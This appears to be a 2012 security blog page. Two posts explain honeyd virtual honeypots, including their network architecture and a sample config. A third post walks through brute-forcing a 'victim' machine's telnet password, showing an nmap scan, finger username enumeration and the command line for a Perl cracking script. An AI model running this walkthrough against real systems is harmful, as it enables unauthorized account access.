PoiNtEr->: security



Showing posts with label security. Show all posts

Thursday, May 17, 2012

HoneyD Network Architecture






As the diagram shows, the design has three distinct network segments:


  • Publicly route-able IPs
  • Internal network for honeypot hosts
  • Virtual network for honeyd guest systems. These IP addresses sit on the loopback interface of the honeyd host, with a static route on the firewall that sends all traffic for the virtual network to the honeyd host.

Using a perimeter firewall with NAT/PAT capabilities allows easy switching between emulated systems and services if your public IP resources are limited; a large network of guests can be configured in advance and left static, then a quick firewall change is all that is required to expose different systems to the world.

Additionally, as much as honeypot systems are designed to be compromised and to collect information about malicious attacks (or perhaps more correctly, because of this), low-interaction systems like honeyd are designed to avoid full compromise. If something does go wrong and the host system is fully compromised, a (sufficiently configured) perimeter firewall provides some control over outgoing traffic, limiting the attacker's options for using the honeypot sensor to attack other systems.

HoneyD -- A Virtual Honeypot


Introduction
Welcome, fellow hackers! This time, I will review a very nice hacking tool that I really find interesting: honeyd (pronounced “honey-dee” or “honey-daemon”). It is a powerful virtual honeypot tool written by Niels Provos and released as open source under the GNU General Public License, as part of the Honeynet project. It runs on GNU/Linux distributions and the *BSDs.

To anyone who doesn’t know, a honeypot is a public or private computer that is intentionally left insecure, unpatched, without an antivirus or firewall, etc., which actually encourages malicious hackers to attack it. This is a perfect tool for catching potential black-hat network intruders or spammers and monitoring their behavior, or even giving hackers a huge playground to explore and put their networking skills to the test without disrupting others.

If you have the cash, you can even set up multiple honeypots in your home or workplace, which act as convincing “decoy machines” that can help protect your legitimate computers from crackers. Networks like these are called honeynets. Now, let’s back up a bit. Note the keywords in the first sentence: If you have the cash. Setting up a honeynet as a hobbyist can be hard, space-wise and money-wise, but honeyd solves both of these issues completely with a quite revolutionary technology: virtual honeypots.



HoneyD is a Virtual Honeypot

Your typical, run-of-the-mill honeypots are made up of physical computers interlinked together and, finally, connected to the internet, should you wish. While this is foolproof, works effectively, and makes logging and forensics simple, it can be very costly to set up for a hobbyist, as it requires them to buy many large servers, baby them, and run up the home electric bill. Remember that in most cases, more = better. There is also the additional risk of a malware infection leaking out of a honeypot onto a legitimate computer and destroying it.

The best way to solve this problem is a virtual honeypot, which is basically a daemon running on one or several computers that generates virtual honeypot computers and places them on the network. Instead of having to buy and set up multiple physical computers, you now only need one computer, which can generate as many virtual honeypots as you wish.

honeyd is an open source application that tries to achieve that goal. Each honeypot is defined in a config file that you load and deploy. You can define virtually any aspect of these honeypots with a simple text editor, such as the operating system, open ports, and more. Through the “honeyd-common” package, found in most Debian/*buntu repositories, honeyd can emulate a whole slew of port services, such as HTTP, FTP, telnet, rsh, SMTP, and plenty more.
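As an added example (not from the original post), here is a small honeyd configuration in the config-file format described above, laid out for the loopback-routed virtual network from the architecture post. It assumes the virtual block 10.0.1.0/24 is statically routed to the honeyd host, that honeyd's stock scripts live in /usr/share/honeyd/scripts, and that the personality strings exist in the nmap.prints fingerprint file honeyd loads.

```text
# honeyd.conf (added example, not from the original post)
# Assumes: the virtual network 10.0.1.0/24 is statically routed from the
# perimeter firewall to the honeyd host, honeyd's stock scripts live in
# /usr/share/honeyd/scripts, and the personality strings below exist in the
# nmap.prints fingerprint file that honeyd loads.

# Template 1: a Linux host offering SSH, SMTP and HTTP
create linux
set linux personality "Linux 2.4.20"
set linux default tcp action reset
set linux default udp action reset
set linux default icmp action open
set linux uptime 1728650
add linux tcp port 22 open
add linux tcp port 25 "sh /usr/share/honeyd/scripts/smtp.sh"
add linux tcp port 80 "sh /usr/share/honeyd/scripts/web.sh"

# Template 2: a Windows file server that only answers on the SMB ports
create windows
set windows personality "Microsoft Windows XP Professional SP1"
set windows default tcp action reset
set windows default udp action reset
add windows tcp port 139 open
add windows tcp port 445 open

# The template named "default" is used for every address that is not bound
# below; "block" silently drops packets so unallocated IPs look empty.
create default
set default default tcp action block
set default default udp action block
set default default icmp action block

# Bind templates to virtual addresses inside the routed block
bind 10.0.1.10 linux
bind 10.0.1.11 linux
bind 10.0.1.20 windows

# Start on the honeyd host (interface name is an assumption):
#   honeyd -d -f honeyd.conf -i eth0 10.0.1.0/24
```

Because unbound addresses fall back to the "default" template, you can pre-build a large block of templates and change only the bind lines and the firewall's NAT rules when you want to expose different systems, as the architecture post suggests.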

When would a virtual honeypot be used in the real world? Here is an example scenario: a small company has three servers full of important data that it needs to protect vigilantly, as it cannot risk a malicious hacker break-in. All of the servers have an IDS (intrusion detection system) installed. If one of the servers is running honeyd, it will appear to any attackers that there are hundreds of computers on the network, when really there are only three.

The attacker will have to do much more research and perhaps think twice before hacking, for if they make one mistake and attack a honeypot, the IDS will have them caught red-handed. Their IP address and attack methods will be logged, their port listings and network traffic recorded, and the timeframes noted. Remember that all of the attack’s details can be accessed and observed in real time from the three legitimate servers running honeyd. It truly is the perfect trap, don’t you think?


Feature List

  • Manipulates TCP/IP packets to create the illusion that there is a host on the network.
  • At the time of this writing, honeyd supports up to 65,536 hosts at once.
  • Convincingly emulates a plethora of port services.
  • Can impersonate up to a thousand different operating systems.
  • User can define unique virtual hosts using simple config files.
  • Lets you catch spammers and network intruders, as well as observe their behavior.
  • Safe and isolated from the true host computer(s).




Tuesday, April 10, 2012

Crack Telnet Password Using Brute Force




First install Zenmap on your Ubuntu machine:
sudo apt-get install zenmap

Now open a terminal and run the following command to check the open ports on the victim's system:
nmapfe
In the GUI, enter the victim's IP address in the Target box.

Output (sample):

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-11 07:20 IST
NSE: Loaded 36 scripts for scanning.
Initiating ARP Ping Scan at 07:20
Scanning 192.168.2.10 [1 port]
Completed ARP Ping Scan at 07:20, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:20
Completed Parallel DNS resolution of 1 host. at 07:20, 0.09s elapsed
Initiating SYN Stealth Scan at 07:20
Scanning 192.168.2.10 [1000 ports]
Discovered open port 445/tcp on 192.168.2.10
Discovered open port 80/tcp on 192.168.2.10
Discovered open port 23/tcp on 192.168.2.10
Discovered open port 139/tcp on 192.168.2.10
Completed SYN Stealth Scan at 07:20, 2.70s elapsed (1000 total ports)
Initiating Service scan at 07:20
Scanning 4 services on 192.168.2.10
Completed Service scan at 07:20, 11.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.2.10
Retrying OS detection (try #2) against 192.168.2.10
Retrying OS detection (try #3) against 192.168.2.10
Retrying OS detection (try #4) against 192.168.2.10
Retrying OS detection (try #5) against 192.168.2.10
NSE: Script scanning 192.168.2.10.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 07:21
Completed NSE at 07:21, 0.08s elapsed
NSE: Script Scanning completed.
Nmap scan report for 192.168.2.10
Host is up (0.0021s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
23/tcp  open  telnet      Linux telnetd
80/tcp  open  http        Apache httpd 2.2.17 ((Ubuntu))
|_html-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:24:2B:DB:74:9F (Hon Hai Precision Ind.Co.)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:


Uptime guess: 0.011 days (since Wed Apr 11 07:05:17 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux


Host script results:
| nbstat:  
|   NetBIOS name: UMESH-VOSTRO151, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UMESH-VOSTRO151<00>  Flags: <unique><active>
|     UMESH-VOSTRO151<03>  Flags: <unique><active>
|     UMESH-VOSTRO151<20>  Flags: <unique><active>
|     WORKGROUP<1e>        Flags: <group><active>
|_    WORKGROUP<00>        Flags: <group><active>
| smb-os-discovery:  
|   OS: Unix (Samba 3.5.8)
|   Name: Unknown\Unknown
|_  System time: 2012-04-11 07:21:12 UTC+5.5
|_smbv2-enabled: Server doesn't support SMBv2 protocol


HOP RTT     ADDRESS
1   2.10 ms 192.168.2.10


Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.00 seconds
           Raw packets sent: 1134 (53.704KB) | Rcvd: 1076 (46.608KB)



Now download the following files and extract them:

Open a new terminal, change to the directory with the extracted files, and run the following command.
To get the username, use:
finger @192.168.2.10 (IP address of the victim)
output:
umesh root

Now, to brute-force the password, run the Perl script with the following parameters:
perl Telnet_Crack.pl -h 192.168.2.10 -u umesh -P polish

output:
TRYING : USERNAME = XXXX PASSWORD = password

ATTEMPTING CONNECTION TO 192.168.2.10.

OK ... CONNECTED!!!



It will take time; how long you have to wait for the result depends on the strength of the password.